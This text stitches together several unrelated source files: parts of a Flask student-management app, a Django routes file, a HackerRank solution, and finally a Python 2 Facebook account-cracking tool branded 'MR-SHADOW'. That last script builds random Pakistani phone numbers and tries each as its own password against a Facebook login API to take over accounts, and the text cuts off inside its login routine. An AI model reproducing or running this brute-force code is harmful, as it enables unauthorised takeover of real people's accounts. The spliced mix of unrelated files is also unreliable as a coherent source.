Stu_no_del = request.form.get('Stu_no_del')
print(Stu_no_del)
stu = Stu.query.filter(Stu.StuNo == Stu_no_del).first()
if stu:
db.session.delete(stu)
db.session.commit()
return '<script>' \
'alert("删除成功");' \
'window.history.go(-2);' \
'</script>'
else:
return '<script>' \
'alert("删除失败,没有这个学生,请重新输入");' \
'window.history.back(-1);' \
'</script>'
#老师修改密码
@app.route('/teacher/pas/',methods=['GET','POST'])
def Tpass():
if request.method == 'GET':
return render_template('Tpass.html')
else:
Tea_No = session.get('user_No')
tea = Tea.query.filter(Tea.TeaNo == Tea_No).first()
Tea_pass = Md5(request.form.get('beforepassword'))
if tea.TeaPass == Tea_pass:
Tea_pass1 = request.form.get('last1password')
Tea_pass2 = request.form.get('last2password')
if Tea_pass1 == Tea_pass2:
tea.TeaPass = Md5(Tea_pass1)
db.session.commit()
return redirect(url_for('login'))
else:
return '<script>' \
'alert("俩次密码输入不同,修改失败。");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("原密码错误,修改失败。");' \
'window.history.back(-1);' \
'</script>'
#学生修改密码
@app.route('/student/pas/',methods=['GET','POST'])
def Spass():
if request.method == 'GET':
return render_template('Spass.html')
else:
Stu_No = session.get('user_No')
stu = Stu.query.filter(Stu.StuNo == Stu_No).first()
Stu_pass = Md5(request.form.get('beforepassword'))
if stu.StuPass == Stu_pass:
Stu_pass1 = request.form.get('last1password')
Stu_pass2 = request.form.get('last2password')
if Stu_pass1 == Stu_pass2:
stu.StuPass = Md5(Stu_pass1)
db.session.commit()
return redirect(url_for('login'))
else:
return '<script>' \
'alert("俩次密码输入不同,修改失败。");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("原密码错误,修改失败。");' \
'window.history.back(-1);' \
'</script>'
#管理员修改密码
@app.route('/manager/passpass',methods=['GET','POST'])
def Mpass():
if request.method == 'GET':
return render_template('Mpass.html')
else:
username = session.get('user_No')
user = Manage.query.filter(Manage.username == username).first()
user_pass = Md5(request.form.get('beforepassword'))
if user.password == user_pass:
user_pass1 = request.form.get('last1password')
user_pass2 = request.form.get('last2password')
if user_pass1 == user_pass2:
user.password = Md5(user_pass1)
db.session.commit()
return redirect(url_for('login'))
else:
return '<script>' \
'alert("俩次密码输入不同,修改失败。");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("原密码错误,修改失败。");' \
'window.history.back(-1);' \
'</script>'
#管理员首页
@app.route('/manager/indexindex/')
def Mindex():
addrs = []
nations = []
pols = []
ages = []
dic1 = {}
dic2 = {}
dic3 = {}
dic4 = {}
stus = Stu.query.filter().all()
for stu in stus:
addrs.append(stu.StuAddr[0:2])
nations.append(stu.StuNation)
pols.append(stu.StuPol)
ages.append(stu.StuAge)
#统计学生地区
for addr in addrs:
d = dic1.get(addr)
if d == None:
dic1[addr] = 1
else:
dic1[addr] = dic1[addr] + 1
for dic in dic1:
dic1[dic] = dic1[dic] / len(stus) * 100
#统计学生民族
for nation in nations:
d = dic2.get(nation)
if d == None:
dic2[nation] = 1
else:
dic2[nation] = dic2[nation] + 1
for dic in dic2:
dic2[dic] = dic2[dic]/len(stus) * 100
#统计学生的政治面貌
for pol in pols:
d = dic3.get(pol)
if d == None:
dic3[pol] = 1
else:
dic3[pol] = dic3[pol] + 1
for dic in dic3:
dic3[dic] = dic3[dic]/len(stus) * 100
#统计学生的年龄
for age in ages:
d = dic4.get(age)
if d == None:
dic4[age] = 1
else:
dic4[age] = dic4[age] + 1
for dic in dic4:
dic4[dic] = dic4[dic]/len(stus) * 100
lss = lesson_stu.query.filter().all()
dic5 = {}
scores = []
for ls in lss:
scores.append(ls.score)
for score in scores:
if score == None:
score = '无成绩'
elif score<60 and score >= 0:
score = '不及格'
elif score>=60 and score<70:
score = '及格'
elif score<80 and score>=70:
score = '中等'
elif score<90 and score>=80:
score = '良好'
elif score<=100 and score>=90:
score = '优秀'
else:
score = '无成绩'
d = dic5.get(score)
if d == None:
dic5[score] = 1
else:
dic5[score] = dic5[score] + 1
for dic in dic5:
dic5[dic] = dic5[dic]/len(lss) * 100
dic5[dic] = round(dic5[dic],1)
return render_template('Mindex.html',dic1=dic1,dic2=dic2,dic3=dic3,dic4=dic4,dic5=dic5)
#管理员课程管理
@app.route('/manager/ui_elementsui_elements/',methods=['GET','POST'])
def Mui_elements():
if request.method == 'GET':
lessons = Lesson.query.filter().all()
return render_template('Mui_elements.html',lessons=lessons)
else:
lesson_no = request.form.get('lesson_no')
if lesson_no:
lesson_name = request.form.get('lesson_name')
lesson_credits = request.form.get('lesson_credits')
lesson_teacher = request.form.get('lesson_teacher')
temp1 = re.search("\\D+",lesson_teacher)
if temp1:
return '<script>' \
'alert("输入的授课教师工号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if lesson_no == '' or lesson_name == '' or lesson_credits == '':
return '<script>' \
'alert("课程号、课程名称和学分都需要添加,请重新输入");' \
'window.history.back(-1);' \
'</script>'
fff = re.search("\\D+", lesson_credits)
if fff:
return '<script>' \
'alert("您输入了非法的学分,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
lesson_credits = int(lesson_credits)
flag = re.search("\\D+", lesson_no)
if flag:
return '<script>' \
'alert("您输入了非法的课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
if len(lesson_no) == 5:
lesson = Lesson.query.filter(Lesson.LessonNo == lesson_no).first()
if lesson:
return '<script>' \
'alert("此课程号以存在,添加失败,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if lesson_credits <= 10 and lesson_credits > 0:
lesson = Lesson(LessonNo=lesson_no, LessonName=lesson_name, LessonCredits=lesson_credits)
lesson.Tea = Tea.query.filter(Tea.TeaNo == lesson_teacher).first()
db.session.add(lesson)
db.session.commit()
return redirect(url_for('Mui_elements'))
else:
return '<script>' \
'alert("您输入了非法的学分,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("您输入了非法的课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
lesson_no_last = request.form.get('lesson_no_last')
if lesson_no_last:
lesson_name_last = request.form.get('lesson_name_last')
lesson_credits_last = request.form.get('lesson_credits_last')
lesson_teacher_last = request.form.get('lesson_teacher_last')
temp1 = re.search("\\D+", lesson_teacher_last)
if temp1:
return '<script>' \
'alert("输入的授课教师工号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if lesson_no_last == '' or lesson_name_last == '' or lesson_credits_last == '':
return '<script>' \
'alert("课程名称和学分都需要重新修改,请重新输入");' \
'window.history.back(-1);' \
'</script>'
fff = re.search('\\D+', lesson_credits_last)
if fff:
return '<script>' \
'alert("您输入了非法的学分,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
lesson_credits_last = int(lesson_credits_last)
flag = re.search('\\D+', lesson_no_last)
if flag:
return '<script>' \
'alert("不存在此课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
if len(lesson_no_last) == 5:
if lesson_credits_last <= 10 and lesson_credits_last > 0:
lesson = Lesson.query.filter(Lesson.LessonNo == lesson_no_last).first()
if lesson:
lesson.LessonName = lesson_name_last
lesson.LessonCredits = lesson_credits_last
lesson.Tea = Tea.query.filter(Tea.TeaNo == lesson_teacher_last).first()
db.session.commit()
return redirect(url_for('Mui_elements'))
else:
return '<script>' \
'alert("不存在此课程号,请重新输入或到添加模块添加");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("您输入了非法的学分,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("不存在此课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
lesson_no_de = request.form.get('lesson_no_de')
if lesson_no_de:
if lesson_no_de == '':
return '<script>' \
'alert("需要添加课程号,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if len(lesson_no_de) == 5:
lesson = Lesson.query.filter(Lesson.LessonNo == lesson_no_de).first()
if lesson:
db.session.delete(lesson)
db.session.commit()
return redirect(url_for('Mui_elements'))
else:
return '<script>' \
'alert("不存在的课程,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("不存在的课程,请重新输入");' \
'window.history.back(-1);' \
'</script>'
else:
return '<script>' \
'alert("课程号、课程名称和学分都需要添加,请重新输入");' \
'window.history.back(-1);' \
'</script>'
#管理员管理学生
@app.route('/manager/chartchart/')
def Mchart():
return render_template('Mchart.html')
#管理员添加学生
@app.route('/manager/chartchart/MinsertSMinsertS/',methods=['GET','POST'])
def M_insert_S():
if request.method == 'GET':
return render_template('MinsertS.html')
else:
Stu_no = request.form.get('Stu_no')
Stu_name = request.form.get('Stu_name')
Stu_pass = request.form.get('Stu_pass')
Stu_gen = request.form.get('Stu_gen')
Stu_grade = request.form.get('Stu_grade')
Stu_pro = request.form.get('Stu_pro')
Stu_year = request.form.get('Stu_year')
Stu_addr = request.form.get('Stu_addr')
Stu_age = request.form.get('Stu_age')
Stu_nation = request.form.get('Stu_nation')
Stu_pol = request.form.get('Stu_pol')
Stu_rec = request.form.get('Stu_rec')
Stu_flag = request.form.get('Stu_flag')
temp1 = re.search("\\D+",Stu_no)
if Stu_no == '' or Stu_name == '' or Stu_gen == '' or Stu_grade == '' or Stu_pro == '' or Stu_year == '' or Stu_addr == '' or Stu_age == '' or Stu_nation == '' or Stu_pol == '' or Stu_pass == '':
return '<script>' \
'alert("学号、姓名、性别、年级、专业、学制、现住址、年龄、民族和政治面貌这些都需要输入,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if temp1:
return '<script>' \
'alert("学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp2 = re.search("\\D+",Stu_grade)
if temp2:
return '<script>' \
'alert("年级不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp3 = re.search("\\D+",Stu_year)
if temp3:
return '<script>' \
'alert("学制不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
temp4 = re.search("\\D+",Stu_age)
if temp4:
return '<script>' \
'alert("年龄不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_gen != u'男' and Stu_gen != u'女':
return '<script>' \
'alert("性别输入不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
Stu_grade = int(Stu_grade)
Stu_year = int(Stu_year)
Stu_age = int(Stu_age)
if Stu_grade <= 1970:
return '<script>' \
'alert("输入的年级不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_year<=0 or Stu_year >= 10:
return '<script>' \
'alert("输入的学制不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_age <=12 or Stu_age >=100:
return '<script>' \
'alert("输入的年龄有点儿离谱,如情况属实,请联系管理员");' \
'window.history.back(-1);' \
'</script>'
if len(Stu_no) != 10:
return '<script>' \
'alert("学号不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
stu = Stu.query.filter(Stu.StuNo == Stu_no).first()
if stu:
return '<script>' \
'alert("该学生已经存在,请重新输入学号添加");' \
'window.history.back(-1);' \
'</script>'
stu = Stu(StuNo=Stu_no,StuName=Stu_name,
StuPass=Md5(Stu_pass),StuGen=Stu_gen,
StuGrade=Stu_grade,StuPro=Stu_pro,
StuYear=Stu_year,StuAddr=Stu_addr,
StuAge=Stu_age,StuPol=Stu_pol,
StuNation=Stu_nation,StuRec=Stu_rec,
StuFlag=Stu_flag
)
db.session.add(stu)
db.session.commit()
return redirect(url_for('Mchart'))
#管理员修改学生
@app.route('/manager/chartchart/MupdateSMupdateS/',methods=['GET','POST'])
def M_update_S():
if request.method == 'GET':
#### 利用全局变量,对用户输入的学号进行查询,并返回到网页上
global Stu_no_sel
Stu_no_sel = request.args.get('Stu_no_sel')
sstu = Stu.query.filter(Stu.StuNo == Stu_no_sel).first()
if sstu:
return render_template('MupdateS.html', sstu=sstu)
return render_template('MupdateS.html',sstu=None)
else:
Stu_name = request.form.get('Stu_name')
Stu_gen = request.form.get('Stu_gen')
Stu_grade = request.form.get('Stu_grade')
Stu_pro = request.form.get('Stu_pro')
Stu_year = request.form.get('Stu_year')
Stu_addr = request.form.get('Stu_addr')
Stu_age = request.form.get('Stu_age')
Stu_nation = request.form.get('Stu_nation')
Stu_pol = request.form.get('Stu_pol')
Stu_rec = request.form.get('Stu_rec')
Stu_flag = request.form.get('Stu_flag')
### 利用正则表达式和各个条件对输入进行限制
stu = Stu.query.filter(Stu.StuNo == Stu_no_sel).first()
### 如果用户输入为空的话,就看作不改动
if Stu_name == '':
Stu_name = stu.StuName
if Stu_gen == '':
Stu_gen = stu.StuGen
if Stu_grade == '':
Stu_grade = stu.StuGrade
if Stu_pro == '':
Stu_pro = stu.StuPro
if Stu_year == '':
Stu_year = stu.StuYear
if Stu_addr == '':
Stu_addr = stu.StuAddr
if Stu_age == '':
Stu_age = stu.StuAge
if Stu_pol == '':
Stu_pol = stu.StuPol
if Stu_nation == '':
Stu_nation = stu.StuNation
if Stu_rec == '':
Stu_rec = stu.StuRec
if Stu_flag == '':
Stu_flag = stu.StuFlag
Stu_grade = str(Stu_grade)
temp2 = re.search("\\D+", Stu_grade)
if temp2:
return '<script>' \
'alert("年级不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
Stu_year = str(Stu_year)
temp3 = re.search("\\D+", Stu_year)
if temp3:
return '<script>' \
'alert("学制不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
Stu_age = str(Stu_age)
temp4 = re.search("\\D+", Stu_age)
if temp4:
return '<script>' \
'alert("年龄不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_gen != u'男' and Stu_gen != u'女' and Stu_gen != '':
return '<script>' \
'alert("性别输入不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
Stu_grade = int(Stu_grade)
Stu_year = int(Stu_year)
Stu_age = int(Stu_age)
if Stu_grade <= 1970:
return '<script>' \
'alert("输入的年级不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_year <= 0 or Stu_year >= 10:
return '<script>' \
'alert("输入的学制不合法,请重新输入");' \
'window.history.back(-1);' \
'</script>'
if Stu_age <= 12 or Stu_age >= 100:
return '<script>' \
'alert("输入的年龄有点儿离谱,如情况属实,请联系管理员");' \
'window.history.back(-1);' \
'</script>'
stu.StuName = Stu_name
stu.StuGen = Stu_gen
stu.StuGrade = Stu_grade
stu.StuPro = Stu_pro
stu.StuYear = Stu_year
stu.StuAddr = Stu_addr
stu.StuAge = Stu_age
stu.StuPol = Stu_pol
stu.StuNation = Stu_nation
stu.StuRec = Stu_rec
stu.StuFlag = Stu_flag
db.session.commit()
return redirect(url_for('Mchart'))
#管理员删除学生
@app.route('/manager/chartchart/MdeleteSMdeleteS/',methods=['GET','POST'])
def M_delete_S():
if request.method == 'GET':
return render_template('MdeleteS.html')
else:
Stu_no_del = request.form.get('Stu_no_del')
stu = Stu.query.filter(Stu.StuNo == Stu_no_del).first()
if stu:
db.session.delete(stu)
db.session.commit()
return '<script>' \
'alert("删除成功");' \
'window.history.go(-2);' \
'</script>'
else:
return '<script>' \
'alert("删除失败,没有这个学生,请重新输入");' \
'window.history.back(-1);' \
'</script>'
#管理员管理教师
@app.route('/manager/managemanage/')
def Mmanage():
return render_template('Mmanage.html')
#管理员添加老师
@app.route('/manager/managemanage/MinsertTMinsertT/',methods=['GET','POST'])
def M_insert_T():
if request.method == 'GET':
return render_template('MinsertT.html')
else:
Tea_no = request.form.get('Tea_no')
Tea_name = request.form.get('Tea_name')
Tea_pass = request.form.get('Tea_pass')
if Tea_no == '' or Tea_name == '' or Tea_pass == '':
return '<script>' \
'alert("工号、姓名和密码都不可为空!!!");' \
'window.history.back(-1);' \
'</script>'
temp1 = re.search("\\D+",Tea_no)
if temp1:
return '<script>' \
'alert("输入了非法的工号");' \
'window.history.back(-1);' \
'</script>'
if len(Tea_no)==8:
tea = Tea(TeaNo=Tea_no,TeaName=Tea_name,TeaPass=Md5(Tea_pass))
db.session.add(tea)
db.session.commit()
else:
return '<script>' \
'alert("输入了非法的工号");' \
'window.history.back(-1);' \
'</script>'
return redirect(url_for('Mmanage'))
#管理员修改老师信息
@app.route('/manager/managemanage/MupdateTMupdateT/',methods=['GET','POST'])
def M_update_T():
if request.method == 'GET':
global Tea_no_sel
Tea_no_sel = request.args.get('Tea_no')
ttea = Tea.query.filter(Tea.TeaNo == Tea_no_sel).first()
if ttea:
return render_template('MupdateT.html', ttea=ttea)
return render_template('MupdateT.html',ttea=None)
else:
Tea_name = request.form.get('Tea_name')
tea = Tea.query.filter(Tea.TeaNo == Tea_no_sel).first()
if Tea_name == '':
Tea_name = tea.TeaName
tea.TeaName = Tea_name
db.session.commit()
return redirect(url_for('Mmanage'))
#管理员删除老师信息
@app.route('/manager/managemanage/MdeleteTMdeleteT/',methods=['GET','POST'])
def M_delete_T():
if request.method == 'GET':
return render_template('MdeleteT.html')
else:
Tea_no = request.form.get('Tea_no_del')
print(Tea_no)
temp1 = re.search("\\D+",Tea_no)
if temp1:
return '<script>' \
'alert("输入了非法的工号");' \
'window.history.back(-1);' \
'</script>'
tea = Tea.query.filter(Tea.TeaNo == Tea_no).first()
if tea:
db.session.delete(tea)
db.session.commit()
return '<script>' \
'alert("删除成功");' \
'window.history.go(-2);' \
'</script>'
else:
return '<script>' \
'alert("删除失败,没有这个教师,请重新输入");' \
'window.history.back(-1);' \
'</script>'
@app.route('/logout/')
def logout():
session.clear()
return redirect(url_for('login'))
@app.context_processor
def context_processor():
user_No = session.get('user_No')
if user_No:
if len(user_No)==8:
tea = Tea.query.filter(Tea.TeaNo == user_No).first()
if tea:
return {'tea':tea}
if len(user_No)==10:
stu = Stu.query.filter(Stu.StuNo == user_No).first()
if stu:
return {'stu': stu}
if len(user_No)==5:
manage = Manage.query.filter(Manage.username == user_No).first()
if manage:
return {'manage':manage}
return {'Stu':None}
from flask_script import Manager,Shell
manager = Manager(app)
def make_shell_context():
return dict(app=app,db=db,Stu=Stu,Lesson=Lesson,lesson_stu=lesson_stu)
manager.add_command("shell",Shell(make_context=make_shell_context))
def Md5(pas):
hh = hashlib.md5()
hh.update(pas.encode(encoding = 'utf-8'))
return hh.hexdigest()
if __name__ == '__main__':
manager.run()
#app.run(host='0.0.0.0',port=80)
| [
"noreply@github.com"
] | noreply@github.com |
b7ff58f7fd138ac1e47845971f1c07cefaa5f3c4 | b93d151d6f086635996a0f3d96b3e3b4f54c8743 | /newyear/routes.py | d4993cac84872a5922545c01594fb7cf3eda5486 | [] | no_license | BleddP/cs50python | 9af72baf03c7f3fffb2e1bbe96954a18d063fe1b | 7ae3f5f009c4b8d70d4be8040f4a076be0c62f93 | refs/heads/main | 2023-03-18T00:19:50.137698 | 2021-03-10T13:30:02 | 2021-03-10T13:30:02 | 346,348,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | from django.urls import path
from . import views
urlpatterns = [
path("", views.index, name='index'),
path('tasks', views.tasks, name='tasks'),
path('tasks/add', views.add, name='add')
] | [
"pijpersbleddyn@gmail.com"
] | pijpersbleddyn@gmail.com |
2cc246af3d3baaf1e758bf2b9951bbadf6ea0dba | fa6259a151f8f88a7b7440658ac8544c767fb384 | /TimeConversion.py | 6e913f3edb621bcf44cdb6960ae5ba84eacaca64 | [] | no_license | narendraparachuri/Hackerrank-Python-Solutions | b1507fb7a6b20be7e66d1de984995b535002749d | 484389aa831795ac70ecdeab6e310ff76dd99ce3 | refs/heads/master | 2020-08-02T15:20:10.490845 | 2019-09-29T22:30:21 | 2019-09-29T22:30:21 | 211,405,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | #!/bin/python3
import os
import sys
#
# Complete the timeConversion function below.
#
def timeConversion(s):
timepart=s.split(":")
if s[-2:]=="PM":
if timepart[0]!="12":
timepart[0]=str(int(timepart[0])+12)
else:
if timepart[0]=="12":
timepart[0]="00"
militarytime=':'.join(timepart)
return str(militarytime[:-2])
if __name__ == '__main__':
f = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = timeConversion(s)
f.write(result + '\n')
f.close()
| [
"noreply@github.com"
] | noreply@github.com |
2885492ca5985186fc6679194b29244d55c4fb63 | ff05de5c4aef5aa2c5390c580ba5312bdae48297 | /556633221144556.py | d144d2dcae3b1e4373bd7085350bc14dfe220990 | [] | no_license | ShadowXEsport/la | c1e9ad38f466eef29c80d67001288f64c9022210 | bfa876984cc7e85ccb62ce93182fa135aa9ff783 | refs/heads/main | 2023-01-19T03:27:40.991200 | 2020-12-02T15:46:53 | 2020-12-02T15:46:53 | 317,910,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,751 | py | #!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To MR-SH4DOW
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(50000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 nmbr.py')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def t():
time.sleep(1)
def cb():
os.system('clear')
##### Dev : MR-UNKNOWN-TRICKER#####
##### LOGO #####
logo='''
\033[1;90m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
\033[1;91m░██████╗\033[1;93m██╗░░██╗\033[1;96m░█████╗\033[1;92m░██████╗\033[1;95m░░█████╗\033[1;94m░░██╗░░░░░░░██╗
\033[1;91m██╔════╝\033[1;93m██║░░██║\033[1;96m██╔══██╗\033[1;92m██╔══██╗\033[1;95m██╔══██╗\033[1;94m░██║░░██╗░░██║
\033[1;91m╚█████╗\033[1;93m░███████║\033[1;96m███████║\033[1;92m██║░░██║\033[1;95m██║░░██║\033[1;94m░╚██╗████╗██╔╝
\033[1;91m░╚═══██╗\033[1;93m██╔══██║\033[1;96m██╔══██║\033[1;92m██║░░██║\033[1;95m██║░░██║\033[1;94m░░████╔═████║░
\033[1;91m██████╔╝\033[1;93m██║░░██║\033[1;96m██║░░██║\033[1;92m██████╔╝\033[1;95m╚█████╔╝\033[1;94m░░╚██╔╝░╚██╔╝░
\033[1;91m╚═════╝\033[1;93m░╚═╝░░╚═╝\033[1;96m╚═╝░░╚═╝\033[1;92m╚═════╝\033[1;95m░░╚════╝\033[1;94m░░░░╚═╝░░░╚═╝░░
\033[1;96m♪♪♪♪♪♪♪\033[1;93m░░██╗██╗\033[1;91m░█████╗\033[1;92m░░░██╗██╗
\033[1;95m♪♪♪♪♪♪♪\033[1;93m░██╔╝██║\033[1;91m██╔══██╗\033[1;92m░██╔╝██║ 👉👉👇\033[1;91mS\033[1;93mU\033[1;94mB\033[1;92mS\033[1;97mC\033[1;96mR\033[1;95mI\033[1;91mB\033[1;93mE 👇👈👈
\033[1;91m♪♪♪♪♪♪♪\033[1;93m██╔╝░██║\033[1;91m██║░░██║\033[1;92m██╔╝░██║\033[1;90m▕▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▔▏
\033[1;93m♪♪♪♪♪♪♪\033[1;93m███████║\033[1;91m██║░░██║\033[1;92m███████║\033[1;90m▕ \033[1;93mI \033[1;92mNEED \033[1;91mYOUR \033[1;95mSUPPORT \033[1;90m▏
\033[1;92m♪♪♪♪♪♪♪\033[1;93m╚════██║\033[1;91m╚█████╔╝\033[1;92m╚════██║\033[1;90m▕▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▏
\033[1;94m♪♪♪♪♪♪♪\033[1;93m░░░░░╚═╝\033[1;91m░╚════╝\033[1;92m░░░░░░╚═╝
\033[1;90m■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
\x1b[1;93m----*----*----*----*----*----*----*----*----*----*\033[1;91m----*----*----*----*----*----*----*----*----*----
\x1b[1;92m➣ NAME : MR-SHADOW
\x1b[1;91m➣ YOUTUBE : MR UNKNOWN TRICKER
\x1b[1;91m➣ SECOND YT : MR SHADOW TRICKS
\x1b[1;95m➣ CONTACT US : ig_clasherXesports
\x1b[1;96m➣ WARNING : DON,T CALL ME ONLY TEXT
\x1b[1;94m➣ PATIENCE : SABAR KA PHAL METHA HOTA HAI
\x1b[1;97m➣ NOTE : USE FAST 4G SIM NET
\x1b[1;92m➣ DISCLAMIAR : AWAY FROM ILLIGAL WAY.
\x1b[1;93m----*----*----*----*----*----*----*----*----*----*\033[1;91m----*----*----*----*----*----*----*----*----*----
'''
back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
os.system('clear')
print logo
print "\033[1;92m 🔥[ WELCOME TO UNKNOWN FAMILY ]🔥"
print
print "\033[1;91m ✅SELECT ANY ONE SIM NETWORK✅"
print "\033[1;93m[1]╼╼MOBILINK (Press 1)"
print "\033[1;92m[2]╼╼TELENOR (Press 2)"
print "\033[1;94m[3]╼╼WARID (Press 3)"
print "\033[1;95m[4]╼╼UFONE (Press 4)"
print "\033[1;96m[5]╼╼ZONG (Press 5)"
print "\033[1;97m[6]╼╼UPDATE SYSTEM"
print "\033[1;91m[0]╼╼EXIT (Back) "
print 50*'\033[1;90m-'
action()
def action():
bch = raw_input('\n \033[1;92m🚀ENTER HERE ANY NUMBER \033[1;95m▶▶▶▶▶ \033[1;97m ')
if bch =='':
print '[!] Fill in correctly'
action()
elif bch =="1":
os.system("clear")
print (logo)
print "\033[1;91mMOBILINK/JAZZ CODE HERE"
print "\033[1;94m00, 01, 02, 03, 04,"
print "\033[1;95m05, 06, 07, 08, 09,"
try:
c = raw_input(" \033[1;92mSELECTED CODE \033[1;97m:\033[1;97m ")
k="+923"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print "\033[1;91mTELENOR CODE HERE"
print "\033[1;94m40, 41, 42, 43, 44,"
print "\033[1;95m45, 64, ??, ??, ??,"
try:
c = raw_input(" \033[1;92mSELECTED CODE \033[1;97m: \033[1;97m")
k="+923"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
os.system("clear")
print (logo)
print "\033[1;91mWARID CODE HERE"
print "\033[1;94m20, 21, 22, 23,"
print "\033[1;95m24, ??, ??, ??,"
try:
c = raw_input(" \033[1;92mSELECTED CODE \033[1;97m: \033[1;97m")
k="+923"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system("clear")
print (logo)
print "\033[1;91mUFONE CODE HERE"
print "\033[1;94m31, 32, 33, 34,"
print "\033[1;95m35, 36, 37, ??,"
try:
c = raw_input(" \033[1;92mSELECTED CODE \033[1;97m: \033[1;97m")
k="+923"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="5":
os.system("clear")
print (logo)
print "\033[1;91mZONG CODE HERE"
print "\033[1;94m10, 11, 12, 13,"
print "\033[1;95m14, 15, 16, 17,"
try:
c = raw_input(" \033[1;92mSELECTED CODE \033[1;97m: \033[1;97m")
k="+923"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="6":
os.system("clear")
os.system("pip2 install --upgrade balln")
os.system("pip2 install --upgrade balln")
os.system("clear")
print(logo)
print
psb (" Tool has been successfully updated")
time.sleep(2)
os.system("python2 .README.md")
# elif chb =='3':
# os.system('xdg-open https://www.facebook.com/100002059014174/posts/2677733205638620/?substory_index=0&app=fbl')
# time.sleep(1)
# menu()
elif bch =='0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb ('[✓] \033[1;93mTotal Numbers: '+xxx)
time.sleep(0.5)
psb ('[✓] \033[1;96mPlease wait, process is running ...')
time.sleep(0.5)
psb ('[✓] \033[1;92mLast 07 Digit Crack,pakistan,786786 Found ...')
time.sleep(0.5)
psb ('[!] \033[1;91mPress CTRL Then Press z To Stop This Process')
time.sleep(0.5)
print 50*'\033[1;90m-'
print
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
